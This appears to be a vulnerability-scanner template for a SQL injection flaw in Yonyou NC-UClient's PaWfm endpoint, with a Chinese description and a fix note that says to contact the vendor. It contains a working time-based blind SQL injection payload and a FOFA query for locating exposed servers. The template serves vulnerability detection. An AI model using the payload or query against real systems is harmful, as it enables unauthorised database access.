product: 用友NC-UClient
vName: 用友NC-UClient PaWfm SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友NClient 存在SQL注入漏洞，未授权的攻击者可以通过该漏洞获取数据库敏感信息。
version: ''
note: ''
search:
  FOFA: app="用友-UFIDA-NC" && icon_hash="1085941792"
protocol: http
link: https://download.csdn.net/blog/column/12585253/137708959
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /portal/pt/PaWfm/open?pageId=login&proDefPk=11';waitfor+delay+'0:0:5'--
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: '>='
            num: 5
  - exp:
      method: get
      follow: false
      path: /portal/pt/PaWfm/open?pageId=login&proDefPk=11';waitfor+delay+'0:0:0'--
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: <=
            num: 3